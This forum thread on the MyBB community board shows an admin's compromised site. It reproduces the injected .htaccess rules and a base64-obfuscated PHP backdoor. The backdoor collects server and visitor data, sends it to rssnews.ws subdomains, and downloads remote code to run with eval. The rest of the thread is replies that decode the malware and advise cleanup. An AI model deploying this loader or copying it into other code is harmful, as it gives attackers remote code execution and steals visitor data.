MyBB Community Forums

Woke up this morning to see my forum was down so after browsing through the files on the server I noticed the .htaccess file was changed yesterday, and there was an additional .htaccess file in the uploads directory.

There was an odd .php file in the uploads directory - could this have been added by anything else than someone having access to the server? I've pasted what the files looked like below. With these files the index of the forum was not accessible but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.

Was this a hack or something else?

.htaccess file content -----------------------

Options -MultiViews
ErrorDocument 404 /forum/showthread.php

Options -MultiViews
ErrorDocument 404 /forum/attachment.php

Options -MultiViews
ErrorDocument 404 /forum/sendthread.php

Options -MultiViews
ErrorDocument 404 /forum/syndication.php

Options -MultiViews
ErrorDocument 404 /forum/printthread.php

Options -MultiViews
ErrorDocument 404 /forum/usercp2.php

Options -MultiViews
ErrorDocument 404 /forum/newreply.php

Options -MultiViews
ErrorDocument 404 /forum/showteam.php

Options -MultiViews
ErrorDocument 404 /forum/private.php

Options -MultiViews
ErrorDocument 404 /forum/search.php

Options -MultiViews
ErrorDocument 404 /forum/reputation.php

Options -MultiViews
ErrorDocument 404 /forum/misc.php

Options -MultiViews
ErrorDocument 404 /forum/calendar.php

Options -MultiViews
ErrorDocument 404 /forum/index.php

Options -MultiViews
ErrorDocument 404 /forum/member.php

Options -MultiViews
ErrorDocument 404 /forum/ratethread.php

Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php


PHP file content -----------------------------

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

Nothing between 1.4.9 and 1.4.11 was patched that could have stopped this but this could have been caused by any number of things, totally unrelated to MyBB. Can you see if there's anything in the server logs to see where these files came from??

the base64_decode's point to rssnews.ws, seems to be a hack that's circulating the net for >2 years, you find a lot of forum discussions if you google for that domain name

http://community.zikula.org/module-Forum...tart-0.htm
http://forums.oscommerce.com/index.php?showtopic=301350
...

I too recommend you check your server logs (possibly the timestamp of the modified files can help determine when this happened). As well as chmod settings. Also contact your host. If they changed your .htaccess it means either it was writable when it shouldn't be or someone got a hold of your login data or (on a shared host) someone hacked the host itself.

Your data could be sent to :

http://ads.rssnews.ws
http://7.rssnews.ws
http://71.rssnews.ws

For your own information here is the whois data for that domain :

Quote:RSSNEWS.WS WHOIS
Updated: 18 days ago
Registrant:
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: RSSNEWS.WS
Created on: 20-Mar-07
Expires on: 20-Mar-11
Last Updated on: 18-Jan-10

Administrative Contact:
Katz Global Media, Domain Registrar Email Masking [email protected]
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States
(602) 304-6783 Fax --

Technical Contact:
Katz Global Media, Domain Registrar Email Masking [email protected]
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States
(602) 304-6783 Fax --

Domain servers in listed order:
NS1.RSSNEWS.WS
NS2.RSSNEWS.WS
NS1.VMARKET.INFO

Information Updated: Sat, 6 Feb 2010 02:38:59 UTC

Katz is a Warez site BTW, So it does look fishy.

Thanks for the responses everyone. I assumed this was a hack of mybb since I found the files there first, but we found these files all over the server also under a bunch of other addon domains. From the logs it doesn't look like my FTP/Cpanel logins were compromised.

Long story short, I don't think this was an exploit of mybb, but rather one of a few other older scripts I had laying around. I went through everything, removed all the malware and got rid of old scripts that were sitting out there. My fault, I shouldn't be so lazy about maintaining my files.

Wake up call - thanks again.